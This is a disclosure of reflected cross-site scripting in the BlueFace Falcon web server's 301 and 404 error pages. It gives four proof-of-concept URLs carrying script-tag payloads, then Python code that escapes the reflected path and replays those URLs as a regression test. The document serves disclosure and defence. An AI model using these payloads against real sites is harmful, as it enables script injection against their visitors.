BlueFace Falcon Web Server Error Message Cross-Site Scripting Vulnerability
The following examples were submitted by Matt Murphy <mattmurphy@kc.rr.com>:

* 301 Message XSS

Closing TITLE tag:
http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

Closing A HREF:
http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e

Closing A tag:
http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

* 404 Message XSS

http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/

The 301 examples will simply add a slash and pass it on to the browser, which then raises a 404, exploiting that vulnerability as well (although the 301 exploits will cause some useless HTML to be added on).
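
A defensive counterpart to the examples above, added here and not taken from the Falcon code base: an error-page renderer that encodes the requested path for each context the examples break out of (TITLE text, A HREF attribute, anchor text) and checks the result against the page's own URLs. The page layouts and the names render_301, render_404 and unescaped_reflections are assumptions.

```python
import html
from urllib.parse import quote, unquote

# URLs from the examples above, path component only.
PAGE_PATHS = [
    "/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e",   # closes TITLE
    "/%22%3cscript%3ealert(%22xss%22)%3c/script%3e",            # closes A HREF
    "/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e",       # closes A
    "/%3cscript%3ealert(%22xss%22)%3c/script%3e/",              # 404 message
]

def render_301(raw_path):
    """Assumed 301 body: path echoed in TITLE, in an A HREF, and as link text."""
    target = unquote(raw_path) + "/"          # server appends the slash
    # HTML text context: escape < > & and both quote characters.
    text = html.escape(target, quote=True)
    # URL inside an attribute: percent-encode first, then attribute-escape.
    href = html.escape(quote(target, safe="/"), quote=True)
    return ("<html><head><title>301 Moved: " + text + "</title></head>"
            '<body>Document moved to <a href="' + href + '">' + text
            + "</a></body></html>")

def render_404(raw_path):
    """Assumed 404 body: path echoed once as text."""
    text = html.escape(unquote(raw_path), quote=True)
    return ("<html><head><title>404 Not Found</title></head>"
            "<body>The requested URL " + text + " was not found.</body></html>")

def unescaped_reflections():
    """Return the page paths whose markup survives into either error page."""
    leaked = []
    for p in PAGE_PATHS:
        moved, missing = render_301(p), render_404(p)
        # Exactly one closing TITLE and one closing A means nothing broke out.
        structure_intact = (moved.count("</title>") == 1
                            and moved.count("</a>") == 1)
        if "<script" in moved or "<script" in missing or not structure_intact:
            leaked.append(p)
    return leaked

if __name__ == "__main__":
    print(unescaped_reflections())  # expected: []
```

The same list of paths can be replayed against a patched server's real 301 and 404 responses as a regression check.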